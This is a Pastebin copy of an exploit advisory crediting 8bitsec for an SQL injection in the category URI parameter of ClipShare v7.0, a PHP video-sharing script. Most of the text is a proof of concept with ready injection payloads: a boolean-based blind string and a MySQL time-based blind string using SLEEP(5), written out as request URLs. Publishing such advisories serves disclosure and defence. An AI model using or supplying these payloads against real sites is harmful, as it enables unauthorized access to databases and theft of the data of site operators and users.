Advertisement
AbdulMuttaqin

ClipShare v7.0 - SQL Injection

Oct 16th, 2017
778
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.21 KB | None | 0 0
  1. # Exploit Title: ClipShare v7.0 - SQL Injection
  2. # Date: 2017-10-09
  3. # Exploit Author: 8bitsec
  4. # Vendor Homepage: http://www.clip-share.com/
  5. # Software Link: http://www.clip-share.com/
  6. # Version: 7.0
  7. # Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
  8. # Email: contact@8bitsec.io
  9. # Contact: https://twitter.com/_8bitsec
  10.  
  11. Release Date:
  12. =============
  13. 2017-10-09
  14.  
  15. Product & Service Introduction:
  16. ===============================
  17. ClipShare is the first and most popular PHP video script for building highly-profitable video sharing websites.
  18.  
  19. Technical Details & Description:
  20. ================================
  21.  
  22. SQL injection on [category] URI parameter.
  23.  
  24. Proof of Concept (PoC):
  25. =======================
  26.  
  27. SQLi:
  28.  
  29. https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
  30.  
  31. Parameter: #1* (URI)
  32. Type: boolean-based blind
  33. Title: AND boolean-based blind - WHERE or HAVING clause
  34. Payload: https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
  35.  
  36. Type: AND/OR time-based blind
  37. Title: MySQL >= 5.0.12 AND time-based blind
  38. Payload: https://localhost/[path]/videos/[category]' AND SLEEP(5) AND 'xNCN'='xNCN
  39.  
  40. ==================
  41. 8bitsec - [https://twitter.com/_8bitsec]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement